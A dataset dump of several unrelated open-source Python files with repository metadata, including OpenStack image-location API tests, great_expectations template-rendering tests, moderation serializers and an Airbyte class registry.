original_locs[0]['metadata']['date'] = '2015-10-15'
self.client.update_image(image['id'], [
dict(replace='/locations', value=original_locs)])
# Deleting a location should not work
self.assertRaises(
lib_exc.BadRequest,
self.client.update_image,
image['id'], [
dict(replace='/locations', value=[original_locs[0]])])
# Replacing a location (with a different URL) should not work
new_loc = {'metadata': original_locs[1]['metadata'],
'url': '%s#new3' % CONF.image.http_image}
self.assertRaises(
lib_exc.BadRequest,
self.client.update_image,
image['id'], [
dict(replace='/locations', value=[original_locs[0],
new_loc])])
# Make sure the locations haven't changed with the above failures,
# but the metadata we updated should be changed.
image = self.client.show_image(image['id'])
self.assertEqual(2, len(image['locations']),
'Image should have two locations but has %i' % (
len(image['locations'])))
self.assertEqual(original_locs, image['locations'])
@decorators.idempotent_id('a9a20396-8399-4b36-909d-564949be098f')
def test_set_location_bad_scheme(self):
image = self.client.create_image(container_format='bare',
disk_format='raw')
# Locations should be empty when there is no data
self.assertEqual('queued', image['status'])
self.assertEqual([], image['locations'])
# Adding a new location using a scheme that is not allowed
# should result in an error
new_loc = {'metadata': {'foo': 'bar'},
'url': 'gopher://info.cern.ch'}
self.assertRaises(lib_exc.BadRequest,
self.client.update_image, image['id'], [
dict(add='/locations/-', value=new_loc)])
def _check_set_location_with_hash(self):
image = self.client.create_image(container_format='bare',
disk_format='raw')
# Create a new location with validation data
new_loc = {'validation_data': {'checksum': '1' * 32,
'os_hash_value': 'deadbeef' * 16,
'os_hash_algo': 'sha512'},
'metadata': {},
'url': CONF.image.http_image}
self._update_image_with_retries(image['id'],
[dict(add='/locations/-',
value=new_loc)])
# Expect that all of our values ended up on the image
image = self.client.show_image(image['id'])
self.assertEqual(1, len(image['locations']))
self.assertEqual('1' * 32, image['checksum'])
self.assertEqual('deadbeef' * 16, image['os_hash_value'])
self.assertEqual('sha512', image['os_hash_algo'])
self.assertNotIn('validation_data', image['locations'][0])
self.assertEqual('active', image['status'])
return image
@decorators.idempotent_id('42d6f7db-c9f5-4bae-9e15-a90262fe445a')
def test_set_location_with_hash(self):
self._check_set_location_with_hash()
@decorators.idempotent_id('304c8a19-aa86-47dd-a022-ec4c7f433f1b')
def test_set_location_with_hash_second_matching(self):
orig_image = self._check_set_location_with_hash()
new_loc = {
'validation_data': {'checksum': orig_image['checksum'],
'os_hash_value': orig_image['os_hash_value'],
'os_hash_algo': orig_image['os_hash_algo']},
'metadata': {},
'url': '%s#new' % CONF.image.http_image}
self._update_image_with_retries(orig_image['id'],
[dict(add='/locations/-',
value=new_loc)])
# Setting the same exact values on a new location should work
image = self.client.show_image(orig_image['id'])
self.assertEqual(2, len(image['locations']))
self.assertEqual(orig_image['checksum'], image['checksum'])
self.assertEqual(orig_image['os_hash_value'], image['os_hash_value'])
self.assertEqual(orig_image['os_hash_algo'], image['os_hash_algo'])
self.assertNotIn('validation_data', image['locations'][0])
self.assertNotIn('validation_data', image['locations'][1])
@decorators.idempotent_id('f3ce99c2-9ffb-4b9f-b2cb-876929382553')
def test_set_location_with_hash_not_matching(self):
orig_image = self._check_set_location_with_hash()
values = {
'checksum': '2' * 32,
'os_hash_value': 'beefdead' * 16,
'os_hash_algo': 'sha256',
}
# Try to set a new location with one each of the above
# substitutions
for k, v in values.items():
new_loc = {
'validation_data': {
'checksum': orig_image['checksum'],
'os_hash_value': orig_image['os_hash_value'],
'os_hash_algo': orig_image['os_hash_algo']},
'metadata': {},
'url': '%s#new' % CONF.image.http_image}
new_loc['validation_data'][k] = v
# This should always fail due to the mismatch
self.assertRaises(lib_exc.Conflict,
self._update_image_with_retries,
orig_image['id'],
[dict(add='/locations/-', value=new_loc)])
# Now try to add a new location with all of the substitutions,
# which should also fail
new_loc['validation_data'] = values
self.assertRaises(lib_exc.Conflict,
self._update_image_with_retries,
orig_image['id'],
[dict(add='/locations/-', value=new_loc)])
# Make sure nothing has changed on our image after all the
# above failures
image = self.client.show_image(orig_image['id'])
self.assertEqual(1, len(image['locations']))
self.assertEqual(orig_image['checksum'], image['checksum'])
self.assertEqual(orig_image['os_hash_value'], image['os_hash_value'])
self.assertEqual(orig_image['os_hash_algo'], image['os_hash_algo'])
self.assertNotIn('validation_data', image['locations'][0])
|
b8c59cf0b9d7cde58786b8b40f48b2b1024e0ea5
|
5dc77586e3e0f9de1f032fd2ca68494d8e58928f
|
/tests/render/test_styled_string_template.py
|
9039382c2a3f23993d48fbcac2b35850bd050713
|
[
"Apache-2.0"
] |
permissive
|
great-expectations/great_expectations
|
dd7c22e6277d6b08bee3ff38a015e6e8cd434df6
|
b0290e2fd2aa05aec6d7d8871b91cb4478e9501d
|
refs/heads/develop
| 2023-09-04T09:30:26.395518
| 2023-09-02T00:00:13
| 2023-09-02T00:00:13
| 103,071,520
| 8,931
| 1,535
|
Apache-2.0
| 2023-09-14T19:57:16
| 2017-09-11T00:18:46
|
Python
|
UTF-8
|
Python
| false
| false
| 6,046
|
py
|
test_styled_string_template.py
|
import pytest
from great_expectations.render.view import DefaultJinjaPageView
# module level markers
pytestmark = pytest.mark.unit
def test_render_template():
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the best of times; it was the worst of times.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"default": {
"classes": ["badge", "badge-warning"],
}
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge badge-warning" >best</span> of times; it was the <span class="badge badge-warning" >worst</span> of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"default": {
"classes": ["badge", "badge-warning"],
},
"params": {
"first_adj": {
"classes": ["badge-error"],
}
},
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge-error" >best</span> of times; it was the <span class="badge badge-warning" >worst</span> of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"params": {
"first_adj": {
"classes": ["badge", "badge-warning"],
}
}
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge badge-warning" >best</span> of times; it was the worst of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
assert DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
"styling": {
"params": {
"first_adj": {
"classes": ["badge", "badge-warning"],
"attributes": {"role": "alert"},
"styles": {"padding": "5px"},
}
}
},
}
).replace(" ", "").replace("\t", "").replace(
"\n", ""
) == '<span>It was the <span class="badge badge-warning" role="alert" style="padding:5px;" >best</span> of times; it was the worst of times.</span>'.replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
def test_render_template_with_extra_dollar_signs_in_template():
result = DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times. Blahhh$hhhh. $Bloooop. "
"Bleep$.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
}
)
assert result.replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the best of times; it was the worst of times. Blahhh$hhhh. $Bloooop. Bleep$.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
result = DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times. Blahhh$$$hhhh. $$Bloooop. Bleep$$$$$.",
"params": {
"first_adj": "best",
"second_adj": "worst",
},
}
)
assert result.replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the best of times; it was the worst of times. Blahhh$$$hhhh. $$Bloooop. Bleep$$$$$.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
def test_render_template_with_extra_dollar_signs_in_param_values():
result = DefaultJinjaPageView().render_string_template(
{
"template": "It was the $first_adj of times; it was the $second_adj of times. Blahhh$hhhh. $Bloooop. "
"Bleep$.",
"params": {
"first_adj": "$best$",
"second_adj": "$$worst$",
},
}
)
assert result.replace(" ", "").replace("\t", "").replace(
"\n", ""
) == "<span>It was the $best$ of times; it was the $$worst$ of times. Blahhh$hhhh. $Bloooop. Bleep$.</span>".replace(
" ", ""
).replace(
"\t", ""
).replace(
"\n", ""
)
|
cccc1c8ec48d734df5cc623351e5b421cc62422a
|
dcb823e295bb94de99a89dd4d69314186b9351b2
|
/bin/__init__.py
|
b4f7cd0dbf495166363e78600c412b91a4d4cdc1
|
[
"MIT"
] |
permissive
|
ellisk42/ec
|
caae2ad9fa7892b2fc456f0d82ee4e3e394ebeb6
|
cb0e63f5c33cd2de360b791038b0f5272750270e
|
refs/heads/master
| 2023-07-05T22:31:26.762022
| 2022-03-16T17:45:10
| 2022-03-16T17:45:10
| 117,295,639
| 371
| 137
|
MIT
| 2023-02-16T20:24:12
| 2018-01-12T22:55:36
|
Slash
|
UTF-8
|
Python
| false
| false
| 2,583
|
py
|
__init__.py
|
"""
EC codebase scripts and executables
These scripts should be run from the root of the repository, e.g.
python bin/<script>
For more usage examples, see the official_figures and official_experiments documents.
Module mapping details:
TODO: remove module mapping code when backwards-compatibility is no longer required.
The below module mapping is required for backwards-compatibility with old pickle files
generated from before the EC codebase refactor. New files added to the codebase do not
need to be added to the mapping, but if the existing modules are moved, then this the
mapping needs to be updated to reflect the move or rename.
The mapping uses the following pattern:
sys.modules[<old module path>] = <new module reference>
This is because the previous structure of the codebase was completely flat, and when refactoring
to a hierarchical files, loading previous pickle files no longer works properly. It is important
to retain the ability to read old pickle files generated from official experiments. As a workaround,
the old module paths are included below. A preferable alternative would be to export program state
into JSON files instead of pickle files to avoid issues where the underlying classes change, so that
could be a future improvement to this project. Until then, we use the module mapping workaround.
For more info, see this StackOverflow answer: https://stackoverflow.com/a/2121918/2573242
"""
import sys
from bin import analyzeDepth
from bin import compiledDriver
from bin import examineFrontier
from bin import graphs
from bin import launch
from bin import logReports
from bin import physics
from bin import rational
from bin import scientificLaws
from bin import symmetryBreaking
from bin import taskRankGraphs
from bin.deprecated import compressionGraph, evolution, extractDeepcoderDataset, python_server, symbolicRegression
sys.modules['analyzeDepth'] = analyzeDepth
sys.modules['compiledDriver'] = compiledDriver
sys.modules['compressionGraph'] = compressionGraph
sys.modules['evolution'] = evolution
sys.modules['examineFrontier'] = examineFrontier
sys.modules['extractDeepcoderDataset'] = extractDeepcoderDataset
sys.modules['graphs'] = graphs
sys.modules['launch'] = launch
sys.modules['logReports'] = logReports
sys.modules['physics'] = physics
sys.modules['python_server'] = python_server
sys.modules['rational'] = rational
sys.modules['scientificLaws'] = scientificLaws
sys.modules['symbolicRegression'] = symbolicRegression
sys.modules['symmetryBreaking'] = symmetryBreaking
sys.modules['taskRankGraphs'] = taskRankGraphs
|
0bfce6589940c53a78a5741b6d61ff9461f05e43
|
0032d988541e85c47b5034c20ecf88220dde5a95
|
/openbook_moderation/views/moderated_objects/serializers.py
|
874e22412091ff2067a19f4e22ed8a09428fdb96
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
OkunaOrg/okuna-api
|
eabd37fef9d2be59b590ed8d72bee084ac377997
|
f87d8e80d2f182c01dbce68155ded0078ee707e4
|
refs/heads/master
| 2022-02-04T21:31:10.577601
| 2021-12-28T18:20:39
| 2021-12-28T18:20:39
| 151,052,951
| 185
| 92
|
MIT
| 2022-01-13T01:00:40
| 2018-10-01T07:44:46
|
Python
|
UTF-8
|
Python
| false
| false
| 2,113
|
py
|
serializers.py
|
from django.conf import settings
from rest_framework import serializers
from openbook_communities.validators import community_name_exists, community_name_characters_validator
from openbook_moderation.models import ModeratedObject
class GetGlobalModeratedObjectsSerializer(serializers.Serializer):
max_id = serializers.IntegerField(
required=False,
)
count = serializers.IntegerField(
required=False,
max_value=20
)
types = serializers.MultipleChoiceField(
choices=[ModeratedObject.OBJECT_TYPE_POST, ModeratedObject.OBJECT_TYPE_POST_COMMENT,
ModeratedObject.OBJECT_TYPE_COMMUNITY,
ModeratedObject.OBJECT_TYPE_USER,
ModeratedObject.OBJECT_TYPE_HASHTAG, ], required=False)
statuses = serializers.MultipleChoiceField(
choices=[ModeratedObject.STATUS_REJECTED, ModeratedObject.STATUS_PENDING,
ModeratedObject.STATUS_APPROVED, ], required=False)
verified = serializers.BooleanField(
required=False,
)
approved = serializers.BooleanField(
required=False,
)
class GetCommunityModeratedObjectsSerializer(serializers.Serializer):
max_id = serializers.IntegerField(
required=False,
)
count = serializers.IntegerField(
required=False,
max_value=20
)
types = serializers.MultipleChoiceField(
choices=[ModeratedObject.OBJECT_TYPE_POST, ModeratedObject.OBJECT_TYPE_POST_COMMENT, ], required=False)
statuses = serializers.MultipleChoiceField(
choices=[ModeratedObject.STATUS_REJECTED, ModeratedObject.STATUS_PENDING,
ModeratedObject.STATUS_APPROVED, ], required=False)
verified = serializers.BooleanField(
required=False,
)
approved = serializers.BooleanField(
required=False,
)
community_name = serializers.CharField(max_length=settings.COMMUNITY_NAME_MAX_LENGTH,
allow_blank=False,
validators=[community_name_characters_validator, community_name_exists])
|
232a2418736a182e62f90dece9d5508fd79d1929
|
e3bb1df7fa4c51900dec7e9ddf5295e1a80938bd
|
/test/hummingbot/connector/derivative/gate_io_perpetual/test_gate_io_perpetual_utils.py
|
a27837cd290e6d3b098fe77d94a63725d1ed4c3f
|
[
"Apache-2.0"
] |
permissive
|
CoinAlpha/hummingbot
|
0d1e2bd94de1280748647108c7d7800a09546eb8
|
c3f101759ab7e7a2165cd23a3a3e94c90c642a9b
|
refs/heads/development
| 2023-09-01T11:24:43.322137
| 2023-08-31T03:08:06
| 2023-08-31T03:08:06
| 439,330,952
| 135
| 98
|
Apache-2.0
| 2023-08-30T13:55:08
| 2021-12-17T12:50:42
|
Python
|
UTF-8
|
Python
| false
| false
| 84
|
py
|
test_gate_io_perpetual_utils.py
|
from unittest import TestCase
class GateIoPerpetualUtilsTests(TestCase):
pass
|
7b5830bd4a8b16c6fc58e8e5a9532bf1636b83f1
|
fa1ad2e2ac7e376fc7cb3b3a6e1bb88eed3e80be
|
/dts/airbyte/airbyte-cdk/python/airbyte_cdk/sources/declarative/parsers/class_types_registry.py
|
49328c7751c98e324f2425b379f97956bea0e25d
|
[
"MIT",
"Apache-2.0",
"BSD-3-Clause",
"Elastic-2.0"
] |
permissive
|
alldatacenter/alldata
|
7bc7713c9f1d56ad6b8e59ea03206d1073b7e047
|
8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6
|
refs/heads/master
| 2023-08-05T07:32:25.442740
| 2023-08-03T13:17:24
| 2023-08-03T13:17:24
| 213,321,771
| 774
| 250
|
Apache-2.0
| 2023-09-06T17:35:32
| 2019-10-07T07:36:18
| null |
UTF-8
|
Python
| false
| false
| 5,884
|
py
|
class_types_registry.py
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
from typing import Mapping, Type
from airbyte_cdk.sources.declarative.auth.declarative_authenticator import NoAuth
from airbyte_cdk.sources.declarative.auth.oauth import DeclarativeOauth2Authenticator
from airbyte_cdk.sources.declarative.auth.token import (
ApiKeyAuthenticator,
BasicHttpAuthenticator,
BearerAuthenticator,
SessionTokenAuthenticator,
)
from airbyte_cdk.sources.declarative.checks import CheckStream
from airbyte_cdk.sources.declarative.datetime.min_max_datetime import MinMaxDatetime
from airbyte_cdk.sources.declarative.declarative_stream import DeclarativeStream
from airbyte_cdk.sources.declarative.extractors import RecordFilter
from airbyte_cdk.sources.declarative.extractors.dpath_extractor import DpathExtractor
from airbyte_cdk.sources.declarative.extractors.record_selector import RecordSelector
from airbyte_cdk.sources.declarative.incremental.datetime_based_cursor import DatetimeBasedCursor
from airbyte_cdk.sources.declarative.interpolation.interpolated_boolean import InterpolatedBoolean
from airbyte_cdk.sources.declarative.interpolation.interpolated_string import InterpolatedString
from airbyte_cdk.sources.declarative.partition_routers.list_partition_router import ListPartitionRouter
from airbyte_cdk.sources.declarative.partition_routers.substream_partition_router import ParentStreamConfig, SubstreamPartitionRouter
from airbyte_cdk.sources.declarative.requesters import RequestOption
from airbyte_cdk.sources.declarative.requesters.error_handlers import HttpResponseFilter
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.constant_backoff_strategy import ConstantBackoffStrategy
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.exponential_backoff_strategy import (
ExponentialBackoffStrategy,
)
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.wait_time_from_header_backoff_strategy import (
WaitTimeFromHeaderBackoffStrategy,
)
from airbyte_cdk.sources.declarative.requesters.error_handlers.backoff_strategies.wait_until_time_from_header_backoff_strategy import (
WaitUntilTimeFromHeaderBackoffStrategy,
)
from airbyte_cdk.sources.declarative.requesters.error_handlers.composite_error_handler import CompositeErrorHandler
from airbyte_cdk.sources.declarative.requesters.error_handlers.default_error_handler import DefaultErrorHandler
from airbyte_cdk.sources.declarative.requesters.http_requester import HttpRequester
from airbyte_cdk.sources.declarative.requesters.paginators.default_paginator import DefaultPaginator
from airbyte_cdk.sources.declarative.requesters.paginators.no_pagination import NoPagination
from airbyte_cdk.sources.declarative.requesters.paginators.strategies.cursor_pagination_strategy import CursorPaginationStrategy
from airbyte_cdk.sources.declarative.requesters.paginators.strategies.offset_increment import OffsetIncrement
from airbyte_cdk.sources.declarative.requesters.paginators.strategies.page_increment import PageIncrement
from airbyte_cdk.sources.declarative.requesters.request_options import InterpolatedRequestOptionsProvider
from airbyte_cdk.sources.declarative.retrievers.simple_retriever import SimpleRetriever
from airbyte_cdk.sources.declarative.schema.inline_schema_loader import InlineSchemaLoader
from airbyte_cdk.sources.declarative.schema.json_file_schema_loader import JsonFileSchemaLoader
from airbyte_cdk.sources.declarative.spec import Spec
from airbyte_cdk.sources.declarative.stream_slicers.cartesian_product_stream_slicer import CartesianProductStreamSlicer
from airbyte_cdk.sources.declarative.transformations import RemoveFields
from airbyte_cdk.sources.declarative.transformations.add_fields import AddedFieldDefinition, AddFields
"""
CLASS_TYPES_REGISTRY contains a mapping of developer-friendly string -> class to abstract the specific class referred to
"""
CLASS_TYPES_REGISTRY: Mapping[str, Type] = {
"AddedFieldDefinition": AddedFieldDefinition,
"AddFields": AddFields,
"ApiKeyAuthenticator": ApiKeyAuthenticator,
"BasicHttpAuthenticator": BasicHttpAuthenticator,
"BearerAuthenticator": BearerAuthenticator,
"CartesianProductStreamSlicer": CartesianProductStreamSlicer,
"CheckStream": CheckStream,
"CompositeErrorHandler": CompositeErrorHandler,
"ConstantBackoffStrategy": ConstantBackoffStrategy,
"CursorPagination": CursorPaginationStrategy,
"DatetimeBasedCursor": DatetimeBasedCursor,
"DeclarativeStream": DeclarativeStream,
"DefaultErrorHandler": DefaultErrorHandler,
"DefaultPaginator": DefaultPaginator,
"DpathExtractor": DpathExtractor,
"ExponentialBackoffStrategy": ExponentialBackoffStrategy,
"HttpRequester": HttpRequester,
"HttpResponseFilter": HttpResponseFilter,
"InlineSchemaLoader": InlineSchemaLoader,
"InterpolatedBoolean": InterpolatedBoolean,
"InterpolatedRequestOptionsProvider": InterpolatedRequestOptionsProvider,
"InterpolatedString": InterpolatedString,
"JsonFileSchemaLoader": JsonFileSchemaLoader,
"ListPartitionRouter": ListPartitionRouter,
"MinMaxDatetime": MinMaxDatetime,
"NoAuth": NoAuth,
"NoPagination": NoPagination,
"OAuthAuthenticator": DeclarativeOauth2Authenticator,
"OffsetIncrement": OffsetIncrement,
"PageIncrement": PageIncrement,
"ParentStreamConfig": ParentStreamConfig,
"RecordFilter": RecordFilter,
"RecordSelector": RecordSelector,
"RequestOption": RequestOption,
"RemoveFields": RemoveFields,
"SimpleRetriever": SimpleRetriever,
"Spec": Spec,
"SubstreamPartitionRouter": SubstreamPartitionRouter,
"SessionTokenAuthenticator": SessionTokenAuthenticator,
"WaitUntilTimeFromHeader": WaitUntilTimeFromHeaderBackoffStrategy,
"WaitTimeFromHeader": WaitTimeFromHeaderBackoffStrategy,
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.